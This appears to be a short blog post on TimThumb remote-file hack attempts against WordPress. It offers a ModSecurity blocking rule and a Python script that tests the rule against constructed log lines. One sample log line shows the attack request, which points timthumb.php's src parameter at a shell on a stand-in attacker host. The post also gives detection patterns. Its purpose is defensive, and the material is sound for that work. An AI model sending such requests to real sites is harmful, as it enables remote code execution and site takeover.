Timthumb.php hack attempts



Hackers are targeting WordPress sites by probing for a ‘timthumb.php’ file and trying to abuse it. Here is an example of a request.

What is Timthumb?

TimThumb is an image-resizing PHP script bundled with many WordPress themes and plugins.

Offending IP:


How to block it?

If you have ModSecurity on your Apache/cPanel server, an easy way to stop this nonsense is by using this rule.

#Timthumb injection rule created by 0sw.com
# REQUEST_URI is the path plus query string; the default @rx operator treats "c=http" as a regex substring match
SecRule REQUEST_URI "c=http" "deny,log,msg:'File Injection Attempt',status:406"

This will return a 406 Not Acceptable server response when someone attempts to trick a php file into remotely loading a payload using “src=http”. The pattern “c=http” works because it is the tail end of “src=http”, but it is a plain substring match, so any other parameter name ending in “c” with an http value (for example a benign redirect parameter) will be blocked too. Check your ModSecurity audit log for false positives after enabling it.
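To see what the rule above actually catches, here is an added example (my own code, not from the post or from ModSecurity) that emulates the rule's substring match over a few constructed Apache access-log lines and reports which requests would have been answered with 406. It also tries a tighter pattern of my own that requires the timthumb.php script name and a src parameter beginning with an absolute http(s) URL, so you can compare the false-positive behaviour; the IPs, paths and log lines are all made up for the example.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not taken from the post). Line 1 is a
# remote-file attempt against timthumb.php, line 2 is a normal local resize,
# line 3 is a benign redirect whose parameter name happens to end in "c",
# line 4 is an ordinary page view.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Aug/2011:12:00:01 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://evil.example/shell.php HTTP/1.1" 200 512',
    '203.0.113.11 - - [10/Aug/2011:12:00:02 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/pic.jpg&w=300 HTTP/1.1" 200 8192',
    '203.0.113.12 - - [10/Aug/2011:12:00:03 +0000] "GET /index.php?redirect_loc=http://example.org/ HTTP/1.1" 302 0',
    '203.0.113.13 - - [10/Aug/2011:12:00:04 +0000] "GET /about/ HTTP/1.1" 200 4096',
]

# Pattern used by the post's rule: SecRule REQUEST_URI "c=http" ... The default
# ModSecurity operator is @rx, so this is a regex search over path + query string.
POST_PATTERN = re.compile(r"c=http")

# Tighter pattern (my suggestion, not from the post): only fire when the request
# names timthumb.php and its src parameter starts with an absolute http(s) URL.
TIGHT_PATTERN = re.compile(r"timthumb\.php\?(?:.*&)?src=https?://", re.IGNORECASE)

# Minimal parser for the Apache common log format lines above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]+" (?P<status>\d{3})'
)


def evaluate(line: str, pattern: re.Pattern) -> Tuple[str, str, int]:
    """Return (client ip, request uri, status the rule would have produced).

    If the pattern matches the request URI, the emulated rule denies with 406
    (as in the post's rule); otherwise the logged status is returned unchanged.
    """
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    uri = m.group("uri")
    status = 406 if pattern.search(uri) else int(m.group("status"))
    return m.group("ip"), uri, status


def blocked_ips(lines: List[str], pattern: re.Pattern) -> List[str]:
    """IPs whose requests the given pattern would have denied with 406."""
    return [ip for ip, _, status in (evaluate(l, pattern) for l in lines) if status == 406]


if __name__ == "__main__":
    for name, pattern in (("post rule", POST_PATTERN), ("tight rule", TIGHT_PATTERN)):
        print(f"== {name}: /{pattern.pattern}/")
        for ip, uri, status in (evaluate(l, pattern) for l in SAMPLE_LOG):
            print(f"  {status}  {ip}  {uri}")
```

Running it shows the post's rule denying both the timthumb attempt and the harmless redirect (because “redirect_loc=http” contains “c=http”), while the tighter pattern denies only the timthumb request. Whichever you deploy, the point stands: review the audit log for a while before trusting a substring rule on production traffic.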